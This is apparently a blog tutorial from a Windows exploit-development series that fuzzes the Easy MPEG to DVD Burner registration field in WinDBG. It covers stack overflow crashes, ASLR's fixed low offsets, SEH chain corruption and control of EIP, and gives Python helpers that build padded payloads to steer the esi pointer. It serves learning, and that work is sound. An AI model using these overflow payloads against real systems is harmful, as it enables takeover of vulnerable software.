Windows Exploit Development (primer II) : Corrupting Structured Exception Handling and Controlling Memory Pointers


Hi folks, this post is part of a series in which I introduce some good fundamentals in Windows exploit development - basically documenting as I learn it myself!

In this post we are going to find out how our input breaks certain structures in memory, find different ways to crash the program and discuss the fun things these crashes let us do with our input! Let's get going :)

What you need to get going

Exactly the same as last time!
  • Windows Virtual Machine 
  • Debugging Tools for Windows
  • Easy MPEG to DVD Burner (copy available on exploit-db)
  • (optional) python script payloadgen.py mentioned later on in the post

Corrupting Memory


I assume you've got everything sorted out in terms of debugging the application. If the debugger has broken in, you can get the application running again after a break by using the "g" command like this:



It should start running unless for some reason it hits another breakpoint. Hit "g" as many times as you need to get the application running smoothly and responding to clicks. Once that's going you can start fuzzing it. According to the Exploit-DB post, the Register function doesn't handle long User Name values well. Try inputting 30 characters as a User Name value.

To make things simpler when we are looking through memory later, try inserting "A" as in the screenshot below.


You might notice the Python script payloadgen.py being used. Don't worry, this is just a simple script I whipped up when I was setting up the VM because I was too frustrated to use any other tools. It gives me command line comfort (because I'm a total command line snob!) and it's pretty easy to write: it just spits out long strings according to some criteria. I've uploaded it here https://gist.github.com/k3170makan/2a053b493ed50856cbbf472e146e490b in case you want to give it a try. Otherwise you should be totally fine just making long strings in Notepad or literally just entering them manually (that just takes some time usually). Anyway, getting back to our exploit; let's make it crash!
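If you'd rather not grab the gist, here is a minimal stand-in sketch. To be clear, this is not payloadgen.py itself; the function name make_fuzz_string is made up for illustration and it only covers the "repeat one character N times" case used in this post.

```python
def make_fuzz_string(length: int, char: str = "A") -> str:
    """Return `length` copies of a single fuzz character.

    Hypothetical helper for this post, not the author's payloadgen.py.
    """
    if len(char) != 1:
        raise ValueError("char must be exactly one character")
    if length < 0:
        raise ValueError("length must not be negative")
    return char * length


# The lengths tried in this post: 30, 50, 100 and roughly 1000 characters.
for n in (30, 50, 100, 1000):
    fuzz = make_fuzz_string(n, "A")
    print(n, fuzz[:10] + "...")
```

Print the full string instead of the preview and paste it into the User Name field.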
Try entering 50 characters as a User Name! You should see the following happen:

Trigger an access violation - Crash number 1

In the screenshot a couple of things are happening. The debugger is telling us an exception has been generated. I'm going to call this crash number 1 - there's another on the way ;) We see that the debugger dropped into thread 0 - this is because it is the thread that was complaining (make sure when using WinDBG you remain aware of the thread context you are working in!). It's also showing us the code that generated the exception. In the next command I check out the stack and we notice there are a bunch of "41"s all over the place - if you suspected this is not normal you're right! What you are seeing are all those "A"s I injected; the program seems to have written them all over its own arguments? How?

Well, what happened here was that the string I entered was copied into memory - because it was way too long, the string crossed the boundaries between stack frames and replaced some of the data that was there originally. As I discussed in the previous post, the data that holds the arguments for each function that was called, the return address pointing back into the function that called it, etc. - is all saved on the stack. Why 0x41? Well, that's the hex version of the ASCII value of the letter "A"!
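If you want to convince yourself of the 0x41 thing without a debugger, a couple of lines of Python will do it. This is just a quick sanity check; the variable names are my own.

```python
fuzz_char = "A"

# ASCII code of the fuzz character, shown in hex.
byte_value = ord(fuzz_char)
print(hex(byte_value))  # 0x41

# Four of them in a row, read as one 32-bit value, is what a
# register or stack slot full of "A"s looks like in the debugger.
dword = int.from_bytes(fuzz_char.encode("ascii") * 4, "little")
print(hex(dword))  # 0x41414141
```

Swap in any other character to see what to look for in the stack dump.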

So because there are a bunch of "A"s lying all over memory an exception was generated. At a high level it means the computer has run into an instruction that cannot sensibly be carried out - the conditions of execution (as defined by this architecture) have been violated. Because all the computer does at this level is basic operations on registers and memory locations, these errors usually have to do with how it accesses memory and what it does with it. Here the instruction tried to touch an address it is not allowed to access - this is why the error we generated is referred to as an "Access Violation".

Analyzing the Memory Corruption


We can figure out why this happened in a bit, but let's look at exactly what the debugger is telling us. The code that generated it is located at 0x001c1b52.

More specifically, it's a mov operation reading a double word from the memory location [ecx+eax*4], which appears to be the address 0xaafaaaf2. The address [ecx+eax*4] can be calculated by hand, or you can just ask WinDBG what it is and it will evaluate it for you. We can also check out what is at this memory address with the "dc" command. Here's how I did that:



So it doesn't look like there is anything interesting at this location; it probably isn't even mapped in memory! Also note the u eip-0x10 eip command above - it is a super easy way to disassemble the code from 0x10 bytes before eip all the way up to the eip value itself.
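If you want to do the [ecx+eax*4] style calculation by hand, it is base + index*scale + displacement, wrapped to 32 bits. Here's a small sketch of that; the register values are made-up placeholders (I'm not reproducing the ones from my screenshot), so plug in whatever your debugger shows.

```python
MASK32 = 0xFFFFFFFF  # x86 (32-bit) addresses wrap around at 2**32


def effective_address(base: int, index: int = 0, scale: int = 1, disp: int = 0) -> int:
    """Compute base + index*scale + disp the way a 32-bit x86 operand does."""
    return (base + index * scale + disp) & MASK32


# Hypothetical register values, for illustration only.
ecx = 0x00001000
eax = 0x41414141  # a register full of "A"s

print(hex(effective_address(ecx, eax, 4)))
```

Notice how a register full of fuzz characters drags the final address somewhere the program never intended to read from.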

As another experiment let's look at what happens when we change the fuzz character to a "B". If our theory is correct the exact same thing should happen, involving the same access violation, except it should show the hexadecimal of the ASCII code for the letter "B", which is 0x42. Here's what happens when you fuzz with a "B":




Yup, it's definitely our input doing this! No doubt! Actually you should doubt: if you're not completely sold, try every character you can and see if it turns out the same way.

Notice that though we are triggering the same instruction (or what looks very much like the same instruction) the memory address of that instruction changes! First time around it's an exception at 0x60a1b52 and this time it's at 0x4471b52? This is caused by Address Space Layout Randomization (ASLR) - basically it randomizes where code is loaded into memory so that memory corruption attacks that rely on a static address will fail, because the address changes every time.

Let's look at how this behaves. I sampled a couple of addresses for this crash and looked at how they change every time; this is what it looked like for 3 runs:


So we got 0x4a1b52 then 0x4561b52 and then 0x49c1b52. There's something odd going on here! ASLR has an R for a reason, so why do all these values have a 0x1b52 at the end - that's, uhm, not random!? I'll cover ASLR bypasses in later posts; for now just realize that it's not totally impossibly random ;)
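A quick way to see the pattern is to split each sampled address into its low 16 bits and everything above them. Windows places modules on 64 KB boundaries, so the low 16 bits of any address inside a module survive relocation. The sketch below only uses the three addresses from my runs; note that the upper part is not necessarily the module base, since the instruction could sit more than 64 KB into the module.

```python
# Crash addresses sampled over three runs (from the paragraph above).
crash_addresses = [0x4A1B52, 0x4561B52, 0x49C1B52]

for addr in crash_addresses:
    low16 = addr & 0xFFFF        # part that stays put between runs
    upper = addr & 0xFFFF0000    # part that moves between runs
    print(f"{addr:#010x} -> upper {upper:#010x}, low {low16:#06x}")

low_parts = {addr & 0xFFFF for addr in crash_addresses}
print(low_parts == {0x1B52})  # True
```

So only the upper part moves between runs, which is why the 0x1b52 tail keeps showing up.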

Corrupting Memory II


We have one way to trigger an access violation - it breaks at code that cannot perform a mov. But that is not to say that this is the only way to crash it. Let's try some other lengths. So far we know that fewer than 50 characters doesn't produce any interesting crashes - let's try 100!

Here's what happens:

Different instruction coming to the party now! I'm gonna call this crash number 2! 

Here we see that when 100 characters are injected it ruins an increment operation targeting the memory location [ecx+0Ch] (here 0Ch means 0C in hexadecimal, hence the h). I've also dumped the stack trace in the screenshot so it's pretty clear this memory corruption is also caused by copying too many B's onto the stack, only here we hit a different depth and it spoiled a different instruction! It's important to collect as many ways to crash the program as possible and then work out which ways mean you can control it.

If you continue increasing the fuzz string length, eventually you hit a length of around 1000 and something like this should happen:


Something amazing just happened! The debugger is telling us it cannot execute what is at address 0x42424242! This is because our input somehow became the literal pointer to the next instruction! Very exciting, because now we actually control eip - we just need to control it in a meaningful way! You'll notice also that I cheated slightly and made the program continue executing after it hit the access violation - the reason I did this is that, sneakily, I knew this string was long enough to corrupt another key stack-based data structure, one which controls the behaviour of something called Structured Exception Handling!

Why did I need to pass the debugger another "g" to get this to trigger? Well, exception handling happens (at a high level for now) by searching through memory for different indicators about how to deal with certain errors in execution. This is essentially the low level implementation of those fancy try-catch blocks people like to use in C++. Structured Exception Handling (SEH) is essentially a linked list of records stored at certain locations on the stack, each one pointing to the next record and to a piece of code (a handler) that responds to an exception. Because, again, our string has gobbled up some stack contents, it also corrupted the SEH chain! I needed to let it run for a bit because the corrupted handler isn't used until the exception is actually dispatched to the SEH chain - first the program triggers the access violation, which the debugger catches, and then, once we continue, SEH calls the corrupted handler.
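To make the "our string gobbled up the SEH record" idea concrete, here is a toy model in Python. On 32-bit Windows each record is two 4-byte pointers: the next record, then the handler. Everything else below is made up for illustration: the addresses, the 16-byte buffer and the helper names are hypothetical and don't come from the target program.

```python
import struct
from typing import Tuple


def pack_seh_record(next_record: int, handler: int) -> bytes:
    """Lay out one 32-bit SEH record: next pointer, then handler pointer."""
    return struct.pack("<II", next_record, handler)


def unpack_seh_record(raw: bytes) -> Tuple[int, int]:
    """Read (next_record, handler) back out of 8 raw bytes."""
    return struct.unpack("<II", raw[:8])


BUFFER_SIZE = 16  # hypothetical local buffer sitting just below the record

# Toy stack region: the buffer, followed directly by a healthy record.
stack = bytearray(b"\x00" * BUFFER_SIZE + pack_seh_record(0x0012FFB0, 0x00401234))

# Copy an over-long run of "B"s into the buffer with no length check.
overflow = b"B" * (BUFFER_SIZE + 8)
stack[:len(overflow)] = overflow

next_record, handler = unpack_seh_record(bytes(stack[BUFFER_SIZE:BUFFER_SIZE + 8]))
print(hex(next_record), hex(handler))  # 0x42424242 0x42424242
```

Once the handler pointer is 0x42424242, dispatching any exception to that record sends execution to 0x42424242, which matches what the debugger complained about.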

A quick way to check the current state of the chain is by either looking at a value in the Thread Environment Block or using some nice shorthand in WinDBG. Here's how it's done:


The !exchain command shows the current SEH chain. As you can see, we definitely caused some weirdness with the 0x42424242.
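Conceptually, walking the chain means starting at the head (on 32-bit Windows the first field of the Thread Environment Block, reachable as fs:[0]) and following next pointers until you hit 0xFFFFFFFF. Below is a rough simulation of that walk over a fake memory map. It is not how !exchain is implemented, and all the addresses are hypothetical.

```python
END_OF_CHAIN = 0xFFFFFFFF


def walk_seh_chain(memory, head, max_records=16):
    """Follow next pointers from `head`.

    `memory` maps a record address to a (next_record, handler) tuple.
    Returns a list of (record_address, handler); handler is None when the
    record address is not readable, which is what a corrupted chain hits.
    """
    records = []
    addr = head
    while addr != END_OF_CHAIN and len(records) < max_records:
        if addr not in memory:
            records.append((addr, None))  # invalid record, stop walking
            break
        next_record, handler = memory[addr]
        records.append((addr, handler))
        addr = next_record
    return records


# Hypothetical healthy chain with two records.
healthy = {
    0x0012FF70: (0x0012FFB0, 0x00401000),
    0x0012FFB0: (END_OF_CHAIN, 0x7C839AD8),
}
# The same first record after the "B" overflow.
corrupted = {0x0012FF70: (0x42424242, 0x42424242)}

for name, mem in (("healthy", healthy), ("corrupted", corrupted)):
    print(name, [(hex(a), hex(h) if h is not None else None)
                 for a, h in walk_seh_chain(mem, 0x0012FF70)])
```

In the corrupted case the walk finds a handler of 0x42424242 and then runs off into an unreadable record.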

So we clearly have some control over the registers here (even the instruction pointer!) directly defined by the values of our input! Either that or the developers should change the name of the program to "Easy arbitrary memory location reader AND MPEG to DVD burner" lol. Beyond just corrupting memory, you might want to play a game where you point this instruction at an arbitrary place in memory and see if we can do cool things or control execution. Let's see!

Controlling a Memory Pointer 

Before moving onto full EIP control, I think we should check out what kind of power we have when controlling memory pointers. I think it's a much gentler way to introduce the concepts and it makes switching to EIP control easier. The reason I say this is that there are a couple of caveats to controlling EIP, like other stuff we need to cushion the value with in order to make our results observable. We don't need that stuff to see the result of our control with memory pointers - we just point them at different places and see what they do!

So let's control the memory pointer being corrupted in the mov eax, dword ptr [esi+0C] instruction.
We essentially have control of the esi register, and it's being used to work out which memory location gets accessed. We should be able to force the program to mov from any arbitrary memory location. To do that we need to know which part of our input string eventually ends up as the esi value; this will give us actual control instead of relying on guess work.

I did a bit of testing and I'm pretty sure 37 characters is close to the length we are looking for. Let's see what happens when I inject 33 "A"s and add 0x22222222 at the end of the payload. We are using the value on the end of the payload as a marker to check how far we are writing into the register our input ends up in. Check out what happens below:

payload: "A"x33 + "0x22222222"
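In Python terms that payload is 33 padding bytes followed by the 32-bit marker packed in little-endian byte order. Here's a rough sketch; build_payload is a name I made up for this post and is not part of payloadgen.py.

```python
import struct


def build_payload(pad_len: int, value: int, pad_char: bytes = b"A") -> bytes:
    """Return `pad_len` padding bytes followed by `value` as a little-endian dword."""
    return pad_char * pad_len + struct.pack("<I", value)


payload = build_payload(33, 0x22222222)
print(len(payload))  # 37
print(payload)
```

Handily, 0x22 is the ASCII code for the double quote character, so this marker can be typed as four double quotes. The same helper works for any other 32-bit value you want to land in the register.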


I actually stumbled on a different crash here! This is crash III. But because it is essentially the exact same flaw as crash II, I don't see any use in treating it as unique for the sake of this tutorial.

What's happening above is that the faulting address ended up being 0x2222224d. Obviously this means the value that landed in the register is 0x2222224d - 0C, and this turns out to be 0x22222241. Notice the 0x41 on the end? Yeah, that's part of our payload! x86 is little-endian, so the lowest byte of the register comes from the earliest byte of the string, which here is the last "A". It means we need to back up a bit and inject 1 less A to get the 0x22222222 nice and neatly into the register. After an adjustment this is what happened to my payload:
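To double-check the arithmetic in the paragraph above, here is the same reasoning as a few lines of Python: subtract the 0C displacement from the faulting address, then unpack the register value into the bytes it was built from. The variable names are my own.

```python
import struct

DISPLACEMENT = 0x0C            # the +0C in [esi+0C]
faulting_address = 0x2222224D  # address reported by the debugger

# Value that must have been in esi when the instruction ran.
esi = (faulting_address - DISPLACEMENT) & 0xFFFFFFFF
print(hex(esi))  # 0x22222241

# The same value as the four payload bytes it came from, in string order.
raw = struct.pack("<I", esi)
print(raw)  # b'A"""'

# How many padding "A"s leaked into the register.
leaked_pad = len(raw) - len(raw.lstrip(b"A"))
print(leaked_pad)  # 1
```

One leaked "A" means the padding is one character too long, so 32 "A"s is the length that lines the marker up with the register.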


As you can see, this is hard confirmation that we are at the exact right length. And here's even more: let's make the value display something cool like 0x13333337. Check it out, we can do that as well, and just to make sure I'm actually calculating esi correctly I ask WinDBG to dump the value for me:


And voilà! You have full control of your first memory pointer, yaaay! Now point it at random locations in memory and see what happens hehe. Can you make it skip over arbitrary instructions and hit others as you wish? Certain values could cause math errors in some places and not in others (it depends on the instruction being exploited!). Check out if there are memory locations that result in strange or different behaviour when you try them as an esi value. Have fun!
